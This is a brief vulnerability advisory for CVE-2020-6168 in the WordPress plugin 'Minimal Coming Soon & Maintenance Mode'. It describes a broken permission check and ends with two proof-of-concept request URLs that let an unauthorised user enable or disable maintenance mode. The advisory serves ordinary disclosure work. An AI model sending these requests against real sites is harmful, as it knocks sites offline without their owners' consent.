Permissions, Privileges, and Access Controls in Minimal Coming Soon & Maintenance Mode - CVE-2020-6168
Published: January 9, 2020
Minimal Coming Soon & Maintenance Mode
Detailed vulnerability description
The vulnerability allows a remote user to escalate privileges on the system.
The vulnerability exists due to improper permission check in the "is_admin()" function. A remote user can send a simple request to enable and disable maintenance mode on a vulnerable site.
PoC:
/wp-admin/admin.php?action=csmm_change_status&new_status=enabled&redirect=/wp-admin/
/wp-admin/admin.php?action=csmm_change_status&new_status=disabled&redirect=/wp-admin/